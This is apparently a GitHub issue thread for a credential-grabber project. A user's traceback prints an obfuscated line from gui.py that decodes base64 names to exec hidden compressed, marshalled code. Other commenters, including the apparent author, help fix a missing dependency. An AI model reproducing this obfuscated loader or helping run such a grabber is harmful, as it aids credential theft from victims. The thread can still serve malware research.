### ISSUE TITLE
was working fine yesterday

### ISSUE THREAD

**Issue by Moxy7x** [Phxnt0m1/Phxnt0mWare-Grabber#31]
Getting this issue please help.

Traceback (most recent call last):
  File "C:\Users\12398\Desktop\Phxnt0mWare-Grabber-main\sound.py", line 1, in <module>
    from playsound import playsound
ModuleNotFoundError: No module named 'playsound'
Traceback (most recent call last):
  File "C:\Users\12398\Desktop\Phxnt0mWare-Grabber-main\gui.py", line 5, in <module>
    ___________(__________(___________(_______________(________________([98, 97, 115, 101, 54, 52]).decode()), ________________([98, 54, 52, 100, 101, 99, 111, 100, 101]).decode())(________________([88, 49, 57, 112, 98, 88, 66, 118, 99, 110, 82, 102, 88, 121, 103, 105, 89, 110, 86, 112, 98, 72, 82, 112, 98, 110, 77, 105, 75, 81, 61, 61])).decode()), ___________(_______________(________________([98, 97, 115, 101, 54, 52]).decode()), ________________([98, 54, 52, 100, 101, 99, 111, 100, 101]).decode())(________________([90, 88, 104, 108, 89, 119, 61, 61])).decode())(____________(___________(__________(___________(_______________(________________([98, 97, 115, 101, 54, 52]).decode()), ________________([98, 54, 52, 100, 101, 99, 111, 100, 101]).decode())(________________([88, 49, 57, 112, 98, 88, 66, 118, 99, 110, 82, 102, 88, 121, 103, 105, 98, 72, 112, 116, 89, 83, 73, 112])).decode()), ___________(_______________(________________([98, 97, 115, 101, 54, 52]).decode()), ________________([98, 54, 52, 100, 101, 99, 111, 100, 101]).decode())(________________([90, 71, 86, 106, 98, 50, 49, 119, 99, 109, 86, 122, 99, 119, 61, 61])).decode())(________________(_________)))) or ___________(__________(___________(_______________(________________([98, 97, 115, 101, 54, 52]).decode()), ________________([98, 54, 52, 100, 101, 99, 111, 100, 101]).decode())(________________([88, 49, 57, 112, 98, 88, 66, 118, 99, 110, 82, 102, 88, 121, 103, 105, 98, 51, 77, 105, 75, 81, 61, 61])).decode()), ___________(_______________(________________([98, 97, 115, 101, 54, 52]).decode()), ________________([98, 54, 52, 100, 101, 99, 111, 100, 101]).decode())(________________([88, 50, 86, 52, 97, 88, 81, 61])).decode())(0)
  File "<string>", line 2, in <module>
ValueError: bad marshal data (unknown type code)

**Comment by PsxHangoutsHosting** [comment]
do in ur cmd : 'pip install playsound'

**Comment by Moxy7x** [comment]
![image](https://github.com/Phxnt0m1/Phxnt0mWare-Grabber/assets/140682495/869d80b5-b82b-4c97-85c7-f5975c3faffe)

**Comment by Phxnt0m1** [comment]
yes sorry about that ill add that in requirements for future updates
